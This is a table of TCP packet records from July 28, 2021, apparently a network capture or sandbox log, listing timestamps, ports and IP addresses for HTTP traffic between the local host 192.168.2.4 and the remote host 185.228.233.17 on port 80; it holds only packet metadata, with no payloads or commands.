Jul 28, 2021 13:47:45.144841909 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144864082 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144897938 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144933939 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144952059 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144984007 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144999981 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.145100117 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148531914 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148586988 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148618937 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148658037 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148699045 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148739100 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148780107 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148813963 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148838043 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148852110 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148871899 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148884058 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148904085 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148912907 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148932934 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148955107 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.148962021 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.148981094 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.149003029 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.149034977 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.149074078 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152189016 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152216911 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152229071 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152360916 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152463913 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152496099 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152508974 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152546883 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152555943 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152590036 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152615070 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152657986 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152663946 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152681112 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152699947 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152709007 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152741909 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152748108 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152764082 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152785063 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152801991 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.152825117 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152946949 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.152993917 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.153016090 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.153055906 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.153064013 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.153103113 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224023104 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224050045 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224066019 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224081039 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224096060 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224114895 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224132061 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224143028 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224189043 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224211931 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224226952 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224248886 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224270105 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224281073 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224303961 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224318981 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224354982 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224390984 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224401951 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224420071 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224437952 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224442959 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224483967 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224522114 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224558115 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224565983 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224600077 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224606991 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224637032 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224647999 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224667072 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224673986 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224709034 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224725962 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224745035 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224761963 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.224770069 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224796057 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.224829912 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.225797892 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228539944 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228565931 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228578091 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228590965 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228605986 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228621006 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228671074 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228688002 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228699923 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228718996 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228730917 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228760004 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228779078 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228809118 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228853941 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228867054 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228890896 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228895903 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228912115 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228923082 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228945971 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228954077 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.228972912 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.228982925 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.229007959 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.229041100 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.229070902 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.229080915 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.229105949 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.234617949 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.234647036 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.234662056 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.234677076 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.234689951 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.234776020 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.234807014 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.235223055 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.235291004 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.236774921 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.238420963 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.238513947 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.238564968 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.239869118 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.241367102 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.241395950 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.241507053 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.243964911 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.243989944 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.244121075 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302002907 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302051067 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302073956 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302098036 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302113056 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302126884 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302145004 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302158117 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302186966 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302203894 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302216053 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302270889 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302292109 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302320957 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302355051 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302371025 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302383900 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302417994 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302434921 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302455902 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302475929 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302489996 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302511930 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302519083 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302535057 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302551985 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302561998 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302575111 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302593946 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302603960 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302623987 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.302633047 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.302678108 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.303045034 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.303102016 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.304143906 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.304548025 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.304647923 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.306281090 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.306410074 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.307615995 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.307986021 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.312719107 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.313662052 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.313690901 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.313802004 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.313863993 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.316673994 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.316865921 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.317020893 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.317687988 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.317809105 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.319787979 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.319899082 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.319991112 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.320728064 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.320828915 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.321403980 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.321439981 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.321490049 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.321515083 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.323209047 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.323813915 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.323863029 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.326704979 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.341286898 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.341470957 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.345843077 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.345865965 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.346005917 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.353205919 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.353231907 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.353374958 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.356574059 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.356599092 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.356743097 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.359544039 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.359572887 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.359724045 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.359752893 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.361046076 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.361073017 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.361093998 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.361164093 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.363328934 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.363360882 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.363456011 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.381107092 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.383690119 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.385585070 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.385622978 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.385759115 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.386579990 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.386722088 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.386744976 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.386766911 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.386800051 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.386837006 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.388721943 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.391853094 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.392540932 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.392573118 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.392658949 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.392682076 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.393441916 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.393520117 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.395872116 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.395944118 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.396065950 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.396760941 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.396848917 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.398993015 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.399033070 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.399143934 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.399167061 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.400167942 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.400301933 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.400423050 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.401103020 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.401365042 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.401547909 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.402865887 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.402894020 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.402971029 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.403028011 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.405149937 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.406425953 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.406444073 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.406476021 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.425137043 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.425175905 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.425270081 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.425339937 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.426057100 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.426120996 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.426202059 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.427752972 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.427824020 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.427967072 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.510147095 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:58.655670881 CEST	49745	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:58.656208038 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:58.736377954 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:58.736531973 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:58.737982988 CEST	80	49745	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:58.738089085 CEST	49745	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:58.751058102 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:58.871895075 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.292139053 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.292196989 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.292272091 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.292294979 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.293209076 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.293246984 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.293324947 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.293343067 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.295627117 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.295660019 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.295712948 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.295744896 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.297955036 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.297987938 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.298059940 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.298093081 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.300517082 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.300546885 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.300601959 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.300626040 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.372632027 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.372677088 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.372709990 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.372741938 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.372821093 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.372900009 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.374713898 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.374756098 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.374788046 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.374835014 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.374896049 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.375092983 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.375152111 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.375189066 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.375233889 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.375283957 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.375315905 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.375348091 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.375355959 CEST	49746	80	192.168.2.4	185.228.233.17
